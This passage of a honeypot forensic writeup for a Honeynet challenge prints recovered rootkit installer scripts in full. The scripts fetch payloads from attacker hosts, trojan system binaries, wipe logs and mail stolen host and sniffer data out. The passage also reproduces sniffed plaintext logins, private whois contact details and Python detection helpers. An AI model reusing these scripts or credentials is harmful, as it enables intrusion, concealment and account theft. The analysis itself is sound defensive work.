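                view[int(name)] = raw.decode(errors="replace").strip()
            except OSError:
                pass                          # exited between listdir and open
    return view


def is_self(cmd):
    """The listing tool's own process exists in only one snapshot."""
    parts = cmd.split()
    return bool(parts) and os.path.basename(parts[0]) == "ps"


def hidden_processes(trusted, suspect):
    """PIDs the trusted view shows but the suspect view omits."""
    return {pid: cmd for pid, cmd in trusted.items()
            if pid not in suspect and not is_self(cmd)}


def transient_processes(trusted, suspect):
    """PIDs only in the suspect view: timing artefacts (a cron job that ran
    between the two snapshots), not hidden processes."""
    return {pid: cmd for pid, cmd in suspect.items()
            if pid not in trusted and not is_self(cmd)}


if __name__ == "__main__":
    trusted, suspect = parse_ps(CLEAN_PS), parse_ps(TROJANED_PS)
    for pid, cmd in sorted(hidden_processes(trusted, suspect).items()):
        print("hidden from ps: %6d %s" % (pid, cmd))
```

On this data the diff reports PIDs 5, 3137 and 3153, matching the three hidden processes chkrootkit counted.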
Next, using grep and sleuthkit [15], I was able to locate more information.
As I have often observed, blackhats, after gaining super user status remotely, will always find a way to retrieve their 0day rootkits etc. from somewhere, either utilizing FTP or WGET or by other means like DCC, NETCAT, LYNX etc., to patch their newly owned box. So, using these common hacking methods, I was able to retrieve the following information from the VMX disk.
wget izolam.net/rc/inst -q
wget izolam.net/adore
wget izolam.net/rc/ssh/sp0
wget izolam.net/gods
wget izolam.net/ssltop.tar.gz
wget www.psychoid.lam3rz.de/psybnc
wget geocities.com/mybabywhy/rk.tar.gz
wget geocities.com/gavish19/abc.tgz
wget lugojteam.as.ro/rootkit.tar
wget www.i-need-ftp.as.ro/ttt.gz
wget irine11979.go.ro/mass2.tgz
wget irine11979.netfirms.com/er.tgz
wget irine11979.go.ro/a.tgz
wget takiweb.com/~xlogic/xl.tgz; tar zxvf xl.tgz;cd xl; ./statz
lynx -source 209.249.147.160/~deal/qd 1> qd 2>/dev/null
And after following all the links, duplicating the commands, uncompressing the tarballs and utilizing goooooooooogle, I was able to acquire some of the files and the rootkit. The files, compared using md5sum with the live system's, strongly confirm their similarity.
Grepping /proc/kcore 'core' files also reveals information similar to the previous assessments.
I also discovered part of the sniffer logs, IMHO (forgive me if this is incomplete), and found intruder fingerprints like /sbin/ifconfig -a | mail -s "'/sbin/ifconfig | grep inet | awk '{print $2' | cut -d: -f2'" -c ghost@altavista.com em1nemk1t@yahoo.com. Other relevant information includes the intruder's user and password combination "pwd: hack3r user: hack3r" when installing the rootkit and untarring it.
That’s all folks!!! :- ((
v. ANSWERS TO SOTM 29 QUESTIONS
Questions
A) After resuming the VMX I already knew that the machine was compromised from the NIC output, which showed that promiscuous mode was enabled.
B) By mounting my computer's CD-ROM drive with tools like md5sum, md5deep, chkrootkit and sleuthkit, I was able to confirm the honeypot was compromised by comparing the original md5sum hashes from Project Honeynet to the live host, and by using chkrootkit.
C) Using the Linux binaries like ls and testing how they react when I pass parameters that I know are valid, where the trojaned binaries fail; I also used the find command to look for occurrences of suspicious files and directories on the honeypot, and also strings/grep.
D) Finally I was able to confirm that the intruder utilized LKM rootkits such as suckit [1e] and adore [14] by running strings on each of the suspected files detected by chkrootkit and the files I found manually on the compromised system, and by utilizing Google.
Further details above under LIVE ANALYSIS: WEEKEND 1-2.
Since the CD-ROM drive is mounted RO by default, there is no critical effect on files located on the CD-ROM, since they can't be altered, and no impact on the running system either. Testing the compromised host without any clean binary at hand, I was able to perform post mortem live analysis flawlessly because the altered or modified binaries do not have any self-destructive mechanism that may affect the running system. Running in single user mode or taking down the system for dead analysis prolongs the job and misses some properties available only in the suspended state. IMPACT to system: NONE; to me: AHHHH! just lots of wasted electricity and coffee. :-)
Further details above under LIVE ANALYSIS: WEEKEND 1-2.
PID 25239 /lib/.x/s/xopen -q -p PORT 3128
PID 25241 /lib/.x/s/xopen -q -p PORT 3128
Yes, there were active connections on the compromised system.
The addresses are from the honeypot 192.168.1.79 to:
213.154.118.200 HP WEB ADMIN
64.62.96.42 IRC
199.184.165.133 IRC
192.168.1.1:53 DNS probably VMWARE
Further details above sub-titled WEEKEND 3
I think there were 4 instances of SSH installed:
1 /usr/sbin/sshd time 0:00 AM PID 699
2 /lib/.x/s/xopen time 3:52 PM PID 25239
3 /lib/.x/s/xopen time 3:52 PM PID 25247
4 /usr/bin/"smbd -D" time 3:33 PM PID 3137
Further details above sub-titled WEEKEND 3
ssh disguised as xopen with PIDs 25239 and 25247, which listens on the non-standard ssh port 3128. And /usr/bin/"smbd -D" PID 31337.
Further details above sub-titled WEEKEND 3
Yes, one of the SSH servers was modified: it was /usr/bin/"smbd -D" with PID 3137, which I believe was part of the adore rootkit's fake sshd.
Yes, information was collected by /usr/bin/"smbd -D" and the logs were saved in /usr/lib/libice.log (I believe these are part of the logs, recovered using sleuthkit).
Using chkrootkit I was able to determine the trojaned executables:
pico, ps, ifconfig, ls, netstat, top, /usr/bin/crontabs, /dev/shm/k. And using the data I gathered with standard Linux binaries and sleuthkit, these are the configuration files I've found that are used:
/etc/rc.d/init.d/functions which invoke sniffer /usr/bin/crontabs
/etc/httpd/conf/httpd.conf
Further details above under LIVE ANALYSIS: WEEKEND 1-2, and the detailed script installation process below under SCRIPTS.
Sorry, lack of time; Google will do.
Bonus Question:
What nationality do you believe the attacker(s) to be, and why?
The attacker(s) are Romanian, based on the IP 213.154.118.200, which resolves to is.pcnet.ro, which is also found inside the configuration and log files of psybnc located in the /etc/opt directory and in the output of the clean netstat binary located in /usr/lib/libshtift/. Using grep on the disk and on the core file located at /proc/kcore, I found the attackers' URL-redirected website http://redcode.strobe.org [1j] at http://redcode.go.ro/ from their hosting site (http://strobe.org / http://freedns.afraid.org); see traces. This is also found in the psybnc logs, with channel #redcode seen in them, the blackhat handle [siCk] which is plainly seen, and the Romanian transcripts (translated [1g]) also found in the scripts.
vi. SCRIPTS
File ".inst": installation script for the adore rootkit. Source location: wget izolam.net\inst (remote)
#!/bin/sh
unset HISTFILE HISTSIZE HISTSAVE
BLK="\033[0;30m"
RED="\033[0;31m"
GRN="\033[0;32m"
YEL="\033[0;33m"
BLU="\033[0;34m"
MAG="\033[0;35m"
CYN="\033[0;36m"
WHI="\033[0;37m"
DRED="\033[1;31m"
DGRN="\033[1;32m"
DYEL="\033[1;33m"
DBLU="\033[1;34m"
DMAG="\033[1;35m"
DCYN="\033[1;36m"
DWHI="\033[1;37m"
BW="\033[47;1;30m"
YBL="\033[44;1;33m"
RES="\033[0m"
printf "${YBL}redCode${RES} ${DRED}rkit${RES}\n"
printf "${YBL}redCode${RES}${YBL}redCode${RES}${YBL}redCode${RES}\n"
cd adore
make
mv ava /bin/ava
mv adore.o /usr/lib/
mv cleaner.o /usr/lib/
cd ..
printf "${DCYN}Starting SSHD...${RES}\n"
printf "${DCYN}[${GRN}OK${DCYN}]${RES}\n"
mv ssh/sp0 /bin/
mv ssh/* /usr/lib/
printf "${DCYN}Hiding everything...${RES}\n"
rm -rf /.bash_history
ln -sf /dev/null /root/.bash_history
printf "${DCYN}Cleaning megs ${RES}\n"
rm -rf /var/log/messages
ln -sf /dev/null /var/log/messages
printf "${DCYN}[${GRN}OK${DCYN}]${RES}\n"
echo >>/etc/rc.d/rc.sysinit kflushd
mv kflushd /bin/kflushd
printf "${DCYN}[${GRN}OK${DCYN}]${RES}\n"
printf "${DCYN}Cleaning all the tracks...${RES}\n"
cd ..
rm -rf .rc
printf "${DCYN}[${GRN}OK${DCYN}]${RES}\n"
printf "${DCYN}All done...${RES}\n"
printf "${DCYN}You Got The root${RES} ${YEL}$IP${RES}\n"
printf "${DRED}Copyright ${BW}[siCk]${RES} ${DCYN}\n"
File ".boot": script containing the scripted commands. Location: directory /lib/.x/ (local)
#!/bin/sh
SSHPORT=`cat /lib/.x/s/port`
IP=`cat /lib/.x/ip`
TIME=`date`
/lib/.x/s/xopen -q -p ${SSHPORT} >> /lib/.x/reboot.log
/lib/.x/s/lsn &
/lib/.x/sk p 1 >> /lib/.x/reboot.log
/lib/.x/sk f 1 >> /lib/.x/reboot.log
echo "###Host ${IP} went online on ${TIME}" >> /tmp/13996log
echo >> /tmp/13996maillog
echo >> /tmp/13996maillog
echo "###SSHD backdoor port: ${SSHPORT}" >> /tmp/13996log
echo >> /tmp/13996maillog
echo >> /tmp/13996maillog
echo "###Sniffer log:" >> /tmp/13996log
echo " - TTY Sniffer:" >> /tmp/13996log
cat /lib/.x/.lurker >> /tmp/13996log
echo >> /tmp/13996maillog
echo " - Network Sniffer:" >> /tmp/13996log
cat /lib/.x/s/mfs >> /tmp/13996maillog
echo >> /tmp/13996maillog
echo >> /tmp/13996maillog
echo "###Reboot log:" >> /tmp/13996log
cat /lib/.x/reboot.log >> /tmp/13996log
echo >> /tmp/13996maillog
echo >> /tmp/13996maillog
cat /tmp/13996log | mail -s "Host ${IP} is up!" skiZophrenia_sick@yahoo.com
/lib/.x/hide
/lib/.x/cl -f /var/log/maillog yahoo > /dev/null
/lib/.x/cl -s o.tgz > /dev/null
/lib/.x/cl -s suckit > /dev/null
/lib/.x/cl -s xopen > /dev/null
/lib/.x/cl -s promisc > /dev/null
/lib/.x/cl -f promisc /var/log/secure > /dev/null
rm -rf /tmp/13996*
rm -rf /lib/.x/reboot.log
File ".install": script, part of a file from the original source. wget geocities.com/mybabywhy/rk.tar.gz (remote)
#!/bin/bash
# Made By ICE
BLK='_[1;30m'
RED='_[1;31m'
GRN='_[1;32m'
YEL='_[1;33m'
BLU='_[1;34m'
MAG='_[1;35m'
CYN='_[1;36m'
WHI='_[1;37m'
DRED='_[0;31m'
DGRN='_[0;32m'
DYEL='_[0;33m'
DBLU='_[0;34m'
DMAG='_[0;35m'
DCYN='_[0;36m'
DWHI='_[0;37m'
RES='_[0m'
USERID=`id -u`
echo "${WHI}---${RED} Verificam daca suntem ROOT ${WHI} !!!${RES}"
if [ $USERID -eq 0 ]
then
echo "${RED}+++${WHI} Cica DA ..., deci putem continua ${BLU} :${WHI}-${RED})${RES}"
else
echo "${RED}--- ${DRED}!!! ${RED}Atentie tu eshti de fapt ${YEL}$USERID${RED} si nu ${GRN}RooT ${DRED}!!!${RES}"
echo "${WHI} Asta ii un ${BLU}ROOTKIT${WHI} deshteptule si trebuie sa aiba ${GRN}uid=0${RES}"
exit
fi
rk=`pwd`
home="/usr/bin"
etc="/etc"
usr="/usr/lib/libshtift"
netstat="/bin/netstat"
ls="/bin/ls"
ps="/bin/ps"
top="/usr/bin/top"
chattr="/usr/bin/chattr"
chat="/usr/lib/ld/chat"
pico="/bin/pico"
wget="/usr/bin/wget"
ifconfig="/sbin/ifconfig"
ttyop="/dev/ttyop"
ttyoa="/dev/ttyoa"
ttyof="/dev/ttyof"
if [ -f "/usr/bin/gcc" ]; then
gcc="/usr/bin/gcc"
else
if [ -f "/usr/local/bin/gcc" ]; then
gcc="/usr/local/bin/gcc"
else
if [ -f "/usr/bin/cc" ]; then
gcc="/usr/bin/cc"
else
if [ -f "/usr/local/bin/cc" ]; then
gcc="/usr/local/bin/cc"
else
gcc="/usr/bin/gnikcs"
fi; fi; fi; fi
unset HISTFILE; chown root.root *; unalias &> /dev/null ls
echo " "
echo "${WHI} @@@ ${GRN}OK ${BLU}ICE sau care eshti pe acolo , de preferabil Budu :-)${GRN} .., deci sa bagam mare ${BLU}!!!${WHI}@@@${RES}"
echo " "
if [ -f /etc/rc.d/init.d/portmap ]; then
/etc/rc.d/init.d/portmap stop
fi
if [ -f /etc/rc.d/init.d/syslog ]; then
/etc/rc.d/init.d/syslog stop
fi
killall &> /dev/null -9 syslogd
killall &> /dev/null -9 klogd
killall &> /dev/null -9 atd
$chattr &> /dev/null -ASacdisu /bin /bin/* /usr/bin /usr/bin/* /sbin /sbin/* /usr/sbin /usr/sbin/* $etc/im* $usr $usr/* $ttyop $ttyoa $ttyof
echo "${WHI} Sa tragem o privire dupa fisiere.. ${DRED}!${RES}"
echo " "
if [ -f $chattr ]; then
echo " ${WHI}chattr${RED} -> ${BLU}ok${RES}"
else
if [ -f $chat ]; then
/usr/lib/ld/chat -R -ASacdisu /usr/bin $chat
cp -f $chat $chattr
else
tar -xzf chattr.tgz
mv -f chattr $chattr
echo " ${WHI}chattr${RED}->${BLU}atasat${RES}"
chmod +x $chattr
fi; fi
if [ -f $wget ]; then
echo " ${WHI}wget${RED} -> ${BLU}ok${RES}"
else
tar -xzf wget.tgz
mv -f wget $wget
echo " ${WHI}wget${RED} -> ${BLU}atasat${RES}"
chmod +x $wget
fi
if [ -f $pico ]; then
echo " ${WHI}pico${RED} -> ${BLU}ok${RES}"
else
tar -xzf pico.tgz
mv -f pico $pico
echo " ${WHI}pico${RED} -> ${BLU}atasat${RES}"
chmod +x $pico
fi
echo " ${WHI}Rezolvam tampeniile de ps, netstat si etc.., si pe sora-sa :-P${RES}"
mkdir $usr; mv $netstat $ps $ls $ifconfig $top $usr; mv netstat $netstat; mv ps $ps; mv ifconfig $ifconfig; mv ls $ls; mv top $top; mv .ttyop $ttyop; mv .ttyoa $ttyoa; mv .ttyof $ttyof
echo " ${WHI}Tampeniile${RED} ->${BLU}Done${RES}"
echo " ${WHI}Copiem ${BLU}SSH-ul ${WHI}si ce mai e nevoie :-P .. ${RES}"
mv -f sense sl2 logclear $home; echo "/usr/bin/crontabs -t1 -X53 -p" >> /etc/rc.d/init.d/functions; echo >> /etc/rc.d/init.d/functions; mv crontabs -f /usr/bin/; chmod 500 /usr/bin/crontabs
./ava
$gcc -o swapd kde.c
if [ -f swapd ]; then
mv swapd /usr/bin/"(swapd)"
else
mv swapd2 /usr/bin/"(swapd)"
fi
mv lpi /usr/bin
mv libsss /usr/lib
chmod +x /usr/bin/lpi
/usr/bin/crontabs
/usr/bin/lpi
echo " ${RED}ATENTIE!!! ${DRED}Tu tre sa dai ${WHI} cd /usr/bin ; sense tcp.log ; logclear ${RES}"
./sysinfo > informatii
echo " ${WHI}Imediat iti trimit Mail ${BLU}BAH${WHI} mai ai rabdare 2 min..${RES}"
echo " "
cat informatii|mail -s "SANDERS root" mybabywhy@yahoo.com
cat informatii|mail -s "SANDERS root" buskyn17@yahoo.com
echo " ${WHI}Mail ${RED}-> ${BLU}Done.${RES}"; echo " "
echo " ${WHI}*** ${GRN}Sa ne facem si noi un catun pe aici! ${BLU};${WHI}-${RED}) ${WHI}***${RES}"
if [ ! -d /dev/hpd ]; then
mkdir /dev/hpd
fi
echo " ${WHI}*** ${GRN}Director-ul /dev/hpd a fost deja creat gajiule:))${WHI} ***${RES}"
echo " ${WHI}*** ${BLU}Acum sa stergem logurile care ne incurca ${WHI}***${RES}"
rm -rf /var/log/*
touch /var/log/wtmp
if [ -f /etc/rc.d/init.d/syslog ]; then
/etc/rc.d/init.d/syslog restart
fi
if [ -f /etc/rc.d/init.d/portmap ]; then
/etc/rc.d/init.d/portmap restart
fi
cd ..
unset HISTFILE; $chattr +AacdisSu /bin /bin/* /usr/bin/sense /usr/bin/top /sbin /sbin/* /usr/sbin /usr/sbin/* $etc/im* $ttyop $ttyoa $ttyof
rm -rf /usr/bin/lpi
rm -rf simpa*
echo " "
echo "${WHI}@@@ ${GRN}OK ${BLU}Shefu${GRN}.., e al tau, bucura-te ca eshti mai destept cu un ${BLU}RooT ${BLU};${WHI}-${RED}P ${WHI}@@@${RES}"
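The redCode installer, .boot and .install scripts above leave a consistent set of filesystem artifacts: the /lib/.x and /usr/lib/libshtift directories, the /dev/ttyop, /dev/ttyoa, /dev/ttyof and /dev/hpd entries, .bash_history and /var/log/messages turned into symlinks to /dev/null, and the lines appended to rc.sysinit and init.d/functions. The Python check below is an added example, not part of this writeup or of the recovered kit; it walks a mounted image root for those artifacts and is meant for the dead analysis, because with adore.o loaded the live system would hide the files. The demo tree it scans is constructed.

```python
import os
import tempfile

# Paths the recovered scripts create or drop binaries into; any one present is a strong indicator.
SUSPECT_PATHS = [
    "lib/.x", "usr/lib/libshtift", "dev/ttyop", "dev/ttyoa", "dev/ttyof", "dev/hpd",
    "usr/bin/(swapd)", "usr/bin/crontabs", "usr/bin/sense", "usr/bin/logclear",
    "usr/lib/libsss", "bin/kflushd", "bin/sp0", "bin/ava",
]
# Files the scripts replace with a symlink to /dev/null so nothing more is recorded.
NULLED_FILES = ["root/.bash_history", "var/log/messages"]
# Startup files the scripts append to, with the exact text they append.
APPENDED = {"etc/rc.d/rc.sysinit": "kflushd",
            "etc/rc.d/init.d/functions": "/usr/bin/crontabs -t1 -X53 -p"}

def scan(root):
    """Return a sorted list of the indicators found under the mounted root."""
    findings = []
    for rel in SUSPECT_PATHS:
        if os.path.lexists(os.path.join(root, rel)):
            findings.append(f"suspect path present: /{rel}")
    for rel in NULLED_FILES:
        p = os.path.join(root, rel)
        if os.path.islink(p) and os.readlink(p) == "/dev/null":
            findings.append(f"logging disabled: /{rel} -> /dev/null")
    for rel, needle in APPENDED.items():
        p = os.path.join(root, rel)
        if os.path.isfile(p):
            with open(p, errors="replace") as fh:
                if needle in fh.read():
                    findings.append(f"startup hook: '{needle}' in /{rel}")
    return sorted(findings)

def build_demo_tree(root):
    """Constructed sample: recreate a few artifacts in an empty directory (no rootkit files)."""
    os.makedirs(os.path.join(root, "lib/.x/s"))
    os.makedirs(os.path.join(root, "var/log"))
    os.makedirs(os.path.join(root, "etc/rc.d/init.d"))
    os.symlink("/dev/null", os.path.join(root, "var/log/messages"))
    with open(os.path.join(root, "etc/rc.d/rc.sysinit"), "w") as fh:
        fh.write("# constructed rc.sysinit\n/etc/rc.d/rc.local\nkflushd\n")
    with open(os.path.join(root, "etc/rc.d/init.d/functions"), "w") as fh:
        fh.write("# constructed functions file\n/usr/bin/crontabs -t1 -X53 -p\n\n")

def demo():
    """Scan the constructed tree; on a real case pass the mount point of the image instead."""
    with tempfile.TemporaryDirectory() as root:
        build_demo_tree(root)
        return scan(root)
```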
File "gods": Adore rootkit installation script. Original location http://izolam.net/gods (REMOTE)
unset HISTFILE HISTSIZE HISTSAVE
BLK="\033[0;30m"
RED="\033[0;31m"
GRN="\033[0;32m"
YEL="\033[0;33m"
BLU="\033[0;34m"
MAG="\033[0;35m"
CYN="\033[0;36m"
WHI="\033[0;37m"
DRED="\033[1;31m"
DGRN="\033[1;32m"
DYEL="\033[1;33m"
DBLU="\033[1;34m"
DMAG="\033[1;35m"
DCYN="\033[1;36m"
DWHI="\033[1;37m"
BW="\033[47;1;30m"
YBL="\033[44;1;33m"
RES="\033[0m"
printf "${YBL}redCode${RES}${YBL}redCode${RES}${YBL}redCode${RES}\n"
printf "${YBL}redCode${RES}${YBL}Face Treaba${RES}${YBL}ushoara${RES}\n"
printf "${DCYN}Creating Directory...${RES}\n"
mkdir /tmp/rk
printf "${DCYN}Entering Directory${RES}\n"
cd /tmp/rk
printf "${DCYN}OK${RES}\n"
printf "${DCYN}getting the files...${RES}\n"
wget izolam.net/rc/inst -q
wget izolam.net/rc/kflushd -q
printf "${DCYN}OK${RES}\n"
printf "${DCYN}Creating Directory...${RES}\n"
sleep 1
mkdir /tmp/rk/adore
printf "${DCYN}Entering Directory${RES}\n"
cd /tmp/rk/adore/
printf "${DCYN}OK${RES}\n"
printf "${DCYN}getting the files...${RES}\n"
wget izolam.net/rc/adore/adore.c -q
wget izolam.net/rc/adore/ava.c -q
wget izolam.net/rc/adore/dummy.c -q
wget izolam.net/rc/adore/exec.c -q
wget izolam.net/rc/adore/exec-test.c -q
wget izolam.net/rc/adore/libinvisible.c -q
wget izolam.net/rc/adore/libinvisible.h -q
wget izolam.net/rc/adore/cleaner.c -q
sleep 4
printf "${DCYN}OK${RES}\n"
printf "${DCYN}getting the Makefile${RES}\n"
wget izolam.net/rc/adore/Makefile -q
printf "${DCYN}[${GRN}OK${DCYN}]${RES}\n"
printf "${DCYN}Leaving directory..${RES}\n"
printf "${DCYN}Creating Directory...${RES}\n"
mkdir /tmp/rk/ssh
printf "${DCYN}[${GRN}OK${DCYN}]${RES}\n"
cd /tmp/rk/ssh
printf "${DCYN}getting the files...${RES}\n"
wget izolam.net/rc/ssh/sp0 -q
wget izolam.net/rc/ssh/sp0_cfg -q
wget izolam.net/rc/ssh/sp0_key -q
wget izolam.net/rc/ssh/sp0_seed -q
sleep 2
printf "${DCYN}Changing the file modes..${RES}\n"
chmod 777 sp0
printf "${DCYN}OK${RES}\n"
printf "${DCYN}Leaving directory..${RES}\n"
cd /tmp/rk/
chmod 777 inst kflushd
sleep 1
printf "${DCYN}OK${RES}\n"
printf "${DCYN}Cleaning...${RES}\n"
printf "${DCYN}[${GRN}OK${DCYN}]${RES}\n"
printf "${DCYN}All done...${RES}\n"
printf "${DCYN}You Got The redCode rk${RES} ${YEL}$IP${RES}\n"
printf "${DRED}Copyright ${BW}[siCk]${RES} ${DCYN}\n"
vii. TRACES
trace of 213.154.118.200 or is.pcnet.ro
domain-name: pcnet.ro
description: PC-NET Data Network
admin-contact: MB51-ROTLD
technical-contact: AN160-ROTLD
zone-contact: AB494-ROTLD
nameserver: ns1.pcnet.ro 213.154.128.1
nameserver: ns2.pcnet.ro 213.154.128.2
nameserver: ns3.pcnet.ro 213.154.128.3
info: object maintained by ro.rnc local registry
info: Register your .ro domain names at http://www.samspade.org/t/refer?a=www.rotld.ro
notify: domain-admin@listserv.rnc.ro
object-maintained-by: ROTLD-MNT
mnt-lower: ROTLD-MNT
updated: domain-admin@listserv.rnc.ro 19970519
updated: ciprian@rnc.ro 19990601
updated: ciprian@rnc.ro 19991207
updated: cristih@rnc.ro 20000829
source: ROTLD
person: Mihai Batraneanu
address: PC-NET Data Network S.A.
address: Splaiul Unirii 10, bl B5, sc2, et 1
address: Bucharest, Romania
phone: +40-21-330 28 01
fax-no: +40-21-330 28 42
e-mail: mihai@pcnet.ro
nic-hdl: MB51-ROTLD
info: object maintained by ro.rnc local registry
notify: domain-admin@listserv.rnc.ro
object-maintained-by: ROTLD-MNT
updated: danacorb@sunu.rnc.ro 19970901
updated: ciprian@rnc.ro 19991207
source: ROTLD
person: Alina-Mihaela Nemes
address: PCNET DATA NETWORK SA
address: Bd. Mircea Eliade, nr. 18
address: Bucharest, Romania
phone: +40-21-2080460
fax-no: +40-21-2080461
e-mail: alina@pcnet.ro
nic-hdl: AN160-ROTLD
info: object maintained by ro.rnc local registry
notify: domain-admin@listserv.rnc.ro
object-maintained-by: ROTLD-MNT
updated: danacorb@sunu.rnc.ro 19970901
updated: ciprian@rnc.ro 19991207
updated: imanea@rnc.ro 19991207
source: ROTLD
person: Adrian Batraneanu
address: PC-NET Data Network S.A.
address: Splaiul Unirii 10, bl B5, sc2, et 1
address: Bucharest, Romania
phone: +40-21-330 28 01
fax-no: +40-21-330 28 42
e-mail: adi@pcnet.ro
nic-hdl: AB494-ROTLD
info: object maintained by ro.rnc local registry
notify: domain-admin@listserv.rnc.ro
object-maintained-by: ROTLD-MNT
updated: danacorb@sunu.rnc.ro 19970901
updated: ciprian@rnc.ro 19991207
source: ROTLD
trace of redcode.strobe.org
Domain ID:D7834992-LROR
Domain Name:STROBE.ORG
Created On:08-Jul-1999 05:22:28 UTC
Last Updated On:23-Sep-2003 08:03:27 UTC
Expiration Date:08-Jul-2010 05:22:28 UTC
Sponsoring Registrar:R63-LROR
Status:OK
Registrant ID:22942110-NSI
Registrant Name:Strobe Your Mind
Registrant Organization:Strobe Your Mind
Registrant Street1:19 South 4th Street
Registrant City:Columbia
Registrant State/Province:MO
Registrant Postal Code:65201
Registrant Country:US
Registrant Email:james@STROBE.ORG
Admin ID:15340317-NSI
Admin Name:Strobe Your Mind
Admin Organization:Strobe Your Mind
Admin Street1:19 S 4TH ST
Admin City:COLUMBIA
Admin State/Province:MO
Admin Postal Code:65201-4226
Admin Country:US
Admin Email:james@TRANQUILITY.NET
Billing ID:15340317-NSI
Billing Name:Strobe Your Mind
Billing Organization:Strobe Your Mind
Billing Street1:19 S 4TH ST
Billing City:COLUMBIA
Billing State/Province:MO
Billing Postal Code:65201-4226
Billing Country:US
Billing Email:james@TRANQUILITY.NET
Tech ID:5677673-NSI
Tech Name:Paul ** Saab
Tech Street1:788 Harrison Apt 521
Tech City:San Francisco
Tech State/Province:CA
Tech Postal Code:94107
Tech Country:US
Tech Email:ps@MU.ORG
Name Server:NS1.AFRAID.ORG
Name Server:NS2.AFRAID.ORG
viii. SNIFFER LOGS
Format: source IP => destination IP [PORT], followed by the parsed data of that connection. Location (LOCAL)
64.183.193.202 => mir-serv.ez-closet.com [110]
user jan password jan
cgomez => mir-serv-ez-closet.com [110] most frequent user?
user carlos password eduardo
cgomez => 216.141.104.150 [21]
user anonymous
pass IEUser@
211.114.43.197 => linuxserv.gocadd.com [21]
mir-serv.ez-closet => 216.136.173.10 [110]
USER nellabrito
pass nella
217.156.101.89 => linuxserv.gocadd.com [21]
7K7L707S
host-64-183-193-202.covadbiz.com => mir-serv.ez-closet.com [110]
user jan pass jan
63.222.209.181 => mir-serv.ez-closet.com [110]
user jan pass jan
63.222.209.181 => rpmfind.speakeasy.net [21]
user anonymous pass mozilla@
RETR /linux/rawhide/1.0/i386/RedHat/RPMS/tcpdump-3.6.2-3.i386.rpm
cgomez => mir-serv.ez-closet.com [110]
user caroline pass carola
raq3a.surfmore.net => linuxserv.gocadd.com [21]
JlUSER ftpass lamer@
mir-serv.ez-closet.com => web.rge.com [21]
user anonymous pass IEUser@
RETR /pub/systems/simtelnet/dr/zonelabs/zapro26dr4.exe
cgomez => 216.141.104.150 [21]
user anonymous pass: IEUser@
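The log above has a simple layout: a header line of the form source => destination [port], followed by the parsed data of that connection. The Python below is an added example, not the writeup's own tooling; it parses that layout, pulls out the POP3 and FTP logins sent in clear (both the one-line form and the two-line USER/PASS form seen in the log) and lists the accounts whose passwords must be reset. The sample log it runs on is constructed in the same format, not the captured data.

```python
import re
PORT_PROTO = {21: "ftp", 110: "pop3"}
# Header "source => destination [port]"; anything after the port is an analyst note.
HEADER = re.compile(r"^(\S+)\s*=>\s*(\S+)\s*\[(\d+)\]")
# One-line form ("user jan password jan", "user anonymous pass: IEUser@") or two-line
# form ("USER nellabrito" then "pass nella"); the log mixes upper and lower case.
INLINE = re.compile(r"^user\s+(\S+)\s+pass(?:word)?:?\s+(\S+)", re.I)
USER = re.compile(r"^user\s+(\S+)\s*$", re.I)
PASS = re.compile(r"^pass:?\s+(\S+)\s*$", re.I)

def parse_sessions(text):
    """Group each data line under the header line that precedes it."""
    sessions = []
    for raw in text.splitlines():
        line = raw.strip()
        if m := HEADER.match(line):
            sessions.append({"src": m[1], "dst": m[2], "port": int(m[3]), "data": []})
        elif line and sessions:
            sessions[-1]["data"].append(line)
    return sessions

def exposed_credentials(text):
    """Return (src, dst, protocol, user, password) for every credential sent in clear."""
    creds = []
    for s in parse_sessions(text):
        proto = PORT_PROTO.get(s["port"], str(s["port"]))
        pending = None  # user name still waiting for its PASS line
        for line in s["data"]:
            if m := INLINE.match(line):
                creds.append((s["src"], s["dst"], proto, m[1], m[2]))
            elif m := USER.match(line):
                pending = m[1]
            elif (m := PASS.match(line)) and pending:
                creds.append((s["src"], s["dst"], proto, pending, m[1]))
                pending = None
    return creds

def accounts_to_reset(text):
    """Distinct (server, protocol, user) needing a reset; anonymous FTP is not an account."""
    return sorted({(d, p, u) for _, d, p, u, _ in exposed_credentials(text) if u.lower() != "anonymous"})

# Constructed sample in the recovered log's layout (not the captured data itself).
SAMPLE_LOG = """\
10.0.0.5 => pop.example.net [110]
user alice password wint3r
workstation7 => pop.example.net [110] most frequent user?
USER bob
pass bob123
10.0.0.5 => ftp.example.org [21]
user anonymous pass: IEUser@
203.0.113.9 => ftp.example.org [21]
user carol pass C4rol
"""
```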
ix. LINKS OR RELATED TECHNICAL REFERENCES
[10] Basic Steps in Forensics Analysis of Unix Systems
http://staff.washington.edu/dittrich/misc/forensics/
[11] Thomas Rude - Evidence Seizure Methodology for Computer Forensics
http://www.crazytrain.com/seizure.html
[12] Sniffing (network wiretap, sniffer)
http://www.robertgraham.com/pubs/sniffing-faq.html
[13] Interface Promiscuity Obscurity
http://www.phrack.org/show.php?p=53&a=10
[14] Adore Rootkit
http://spider.scorpions.net/~stealth
[15] SleuthKit
[1a] IANA Port Assignments
http://www.iana.org/assignments/port-numbers
[1b] Assorted online query tool
[1c] Md5deep recursively computes MD5 message digests of input files.
http://md5deep.sourceforge.net/
[1d] Die Putze - The Ultimate Unix logfile cleaner
[1e] Linux on-the-fly kernel patching without LKM: SucKIT, the implementation
http://www.phrack.org/show.php?p=58&a=7
[1f] UPX, the Ultimate Packer for eXecutables
[1g] Language Translation (Utilized in translating portions of file recovered)
http://www.foreignword.com/Tools/transnow.htm
[1h] Powerful Virtual Machine Software for Technical Professionals
[1i] Locally checks for signs of a rootkit
[1j] Romanian Black Hats Web Site
http://redcode.strobe.org/ (hosted by http://freedns.afraid.org / http://strobe.org), URL redirected to http://redcode.go.ro/
"...I am only a bearer of knowledge who has managed to understand how the world really works, and I am willing for my experience and knowledge to be of use to those who eagerly seek true freedom..."
[siCk]